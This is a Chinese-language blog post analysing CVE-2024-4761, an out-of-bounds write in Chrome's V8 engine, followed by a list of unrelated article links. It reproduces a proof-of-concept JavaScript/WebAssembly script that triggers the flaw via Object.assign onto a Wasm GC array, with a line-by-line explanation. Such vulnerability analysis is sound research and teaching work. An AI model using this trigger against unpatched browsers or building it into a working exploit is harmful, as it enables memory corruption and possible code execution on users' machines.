当前位置：首页 > news >正文

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

news 2026/2/9 8:12:55

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞，报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏，进而导致程序崩溃或其他不安全行为。

POC 代码解析

const prefix = "...";d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);let builder = new WasmModuleBuilder();let array = builder.addArray(kWasmI32, true);builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();let instance = builder.instantiate({});
let wasm = instance.exports;let array42 = wasm.createArray(42);let src = {};
src.a = 1;
delete src.a;for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
}Object.assign(array42, src);

在这里插入图片描述

代码分析

加载 wasm-module-builder.js 模块：
```
d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
```
这里假设 D8（V8 引擎的调试工具）正在执行一段 JavaScript 代码，该代码加载了 WebAssembly 模块构建器脚本。
构建 WebAssembly 模块：
```
let builder = new WasmModuleBuilder();
let array = builder.addArray(kWasmI32, true);
```
使用 WasmModuleBuilder 创建一个新的 WebAssembly 模块，并定义一个整数数组类型。
添加和导出一个函数：
```
builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();
```
这个函数 createArray 接受一个整数参数，创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量，创建默认的数组，并将其转换为外部引用。
实例化模块并调用导出函数：
```
let instance = builder.instantiate({});
let wasm = instance.exports;
let array42 = wasm.createArray(42);
```
实例化模块后，调用 createArray 函数，创建一个包含 42 个元素的数组。

构建和修改对象：

let src = {};
src.a = 1;
delete src.a;
for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
}
Object.assign(array42, src);

创建一个对象 src，并在其中动态添加属性。最后，使用 Object.assign 将 src 的属性赋值给 array42。

漏洞利用可能性

此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组，这种操作在 V8 引擎内部可能导致内存管理或边界检查失效，进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域，从而执行任意代码或导致程序崩溃。

结论

从代码来看，这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组，可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷，该操作可能会导致越界写，从而验证 CVE-2024-4761 漏洞的真实性。因此，POC 代码看起来是合理且可能真实的漏洞利用示例。

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

POC 代码解析

代码分析

漏洞利用可能性

结论

相关文章：

CVE-2024-4761 Chrome 的 JavaScript 引擎 V8 中的“越界写入”缺陷

字符串函数（二）：strlen(求长度)，strstr(查找子串)，strtok(分割)，strerror(打印错误信息)

EUCR-30S电机保护器施耐德EOCR

人工神经网络（科普）

宇宙（科普）

安防视频/视频汇聚系统EasyCVR视频融合云平台助力智能化酒店安防体系的搭建

SpringCloudAlibaba:5.1Sentinel的基本使用

SHELL-双重循环习题练习

2024年为什么很多电商商家，都想涌入视频号，究竟是什么原因？

Google Gemma 2B 微调实战（IT科技新闻标题生成）

RabbitMQ：深入理解高性能消息队列

【北京迅为】《iTOP-3588开发板源码编译手册》-第4章 Android12/Linux设备树简介

C++ C# 贝塞尔曲线

勒索软件漏洞？在不支付赎金的情况下解密文件

实时“秒回”，像真人一样语音聊天，GPT-4o模型强到恐怖

Properties配置文件和源码

redis原生命令及项目使用

使用VSCode生成代码、查询数据表

使用 PXE+Kickstart 批量网络自动装机

微信小程序交互增强：实现上拉加载、下拉刷新与一键返回顶部【代码示例】

Unity3D中Gfx.WaitForPresent优化方案

智慧工地云平台源码，基于微服务架构+Java+Spring Cloud +UniApp +MySql

STM32F4基本定时器使用和原理详解

2021-03-15 iview一些问题

【RockeMQ】第2节｜RocketMQ快速实战以及核⼼概念详解（二）

[免费]微信小程序问卷调查系统(SpringBoot后端+Vue管理端)【论文+源码+SQL脚本】

智能职业发展系统：AI驱动的职业规划平台技术解析

uni-app学习笔记三十五--扩展组件的安装和使用

6.9-QT模拟计算器

Vue3 PC端 UI组件库我更推荐Naive UI